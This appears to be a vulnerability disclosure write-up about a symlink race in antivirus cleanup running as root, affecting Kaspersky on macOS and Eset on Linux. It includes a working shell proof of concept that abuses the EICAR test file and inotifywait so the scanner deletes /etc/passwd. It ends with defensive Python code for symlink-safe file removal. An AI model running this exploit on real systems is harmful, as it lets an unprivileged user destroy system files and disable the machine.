This exploit was used against Kaspersky Internet Security for macOS and downloads the EICAR test-string from an alternate source (Pastebin) to bypass real-time protection that prohibits downloading the test-string from the official website.

Once the test-string has been downloaded, the antivirus software immediately detects the file as malware and attempts to clean it up. In our testing we identified a delay of approximately 6-8 seconds, which allows a race condition in which a symlink attack can cause any file to be removed, because the software runs as root.

Linux Notes:

It’s worth noting that the above Proof of Concept for macOS also works against some Linux antivirus software. In our testing we were able to delete important files that would have rendered either the antivirus software or the operating system inoperable, given that most of its file operations run as the root user.

One of the benefits of exploiting antivirus software on Linux is the wide range of available tools that help with the race condition timing. In our case we found ‘inotifywait’ to be extremely helpful. For example, the following Proof of Concept worked against Eset File Server Security:

#!/bin/sh
rm -rf /home/user/exploit ; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
while inotifywait -m "/home/user/exploit/passwd" | grep -m 5 "OPEN"
do
rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit
done

What the above Proof of Concept does is monitor the EICAR test-string that was downloaded to a file called passwd. With the help of ‘inotifywait’ the malicious passwd file is watched for OPEN file operations. After the 5th OPEN the actual symlink attack takes place: the exploit directory is replaced by a symlink to /etc, so the cleanup removes the system /etc/passwd instead, causing a Denial of Service against the operating system.
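The cleanup step these Proofs of Concept race against is an unlink performed as root through a path whose parent directory can be swapped for a symlink between detection and removal. As an added example (not code from this post or from any antivirus product), the Python routine below shows the defensive pattern: open each directory component with O_NOFOLLOW, then unlink relative to the pinned directory descriptor, so a swapped directory makes the removal refuse rather than follow the link. The `demo` helper and its temp-directory paths are constructed for the demonstration and stand in for /home/user/exploit and /etc.

```python
import errno
import os
import tempfile

def safe_unlink_no_symlinks(path: str) -> bool:
    """Unlink absolute `path` without following any symlink in its directory
    chain. Returns True if removed, False if refused. Illustrative only."""
    parts = [p for p in path.split(os.sep) if p]
    if not os.path.isabs(path) or not parts:
        raise ValueError("absolute path below / required")
    # Walk the directory chain one component at a time, each opened relative to
    # the previous descriptor. O_NOFOLLOW makes open() fail with ELOOP if the
    # component is a symlink; O_DIRECTORY fails with ENOTDIR if it is not a dir.
    flags = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW
    dfd = os.open(os.sep, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for comp in parts[:-1]:
            try:
                nfd = os.open(comp, flags, dir_fd=dfd)
            except OSError as e:
                if e.errno in (errno.ELOOP, errno.ENOTDIR, errno.ENOENT):
                    return False  # chain was tampered with or removed: refuse
                raise
            os.close(dfd)
            dfd = nfd
        # dfd now pins the real directory inode: swapping that directory for a
        # symlink afterwards cannot redirect an unlink done relative to dfd.
        try:
            os.unlink(parts[-1], dir_fd=dfd)
        except FileNotFoundError:
            return False
        return True
    finally:
        os.close(dfd)

def demo() -> dict:
    """Constructed scenario replaying the PoC's directory-for-symlink swap."""
    base = os.path.realpath(tempfile.mkdtemp())
    victim = os.path.join(base, "etc", "passwd")        # stands in for /etc/passwd
    detected = os.path.join(base, "exploit", "passwd")  # the scanned file
    for f in (victim, detected):
        os.mkdir(os.path.dirname(f))
        open(f, "w").close()
    clean_removed = safe_unlink_no_symlinks(detected)   # untampered: True
    os.rmdir(os.path.dirname(detected))
    os.symlink(os.path.dirname(victim), os.path.dirname(detected))  # the swap
    refused = not safe_unlink_no_symlinks(detected)     # tampered: refuses
    return {"clean_removed": clean_removed, "refused": refused,
            "victim_intact": os.path.exists(victim)}
```

A production scanner would additionally keep the descriptor of the scanned file open and compare its inode with the directory entry before unlinking, so that the file removed is exactly the one that was detected.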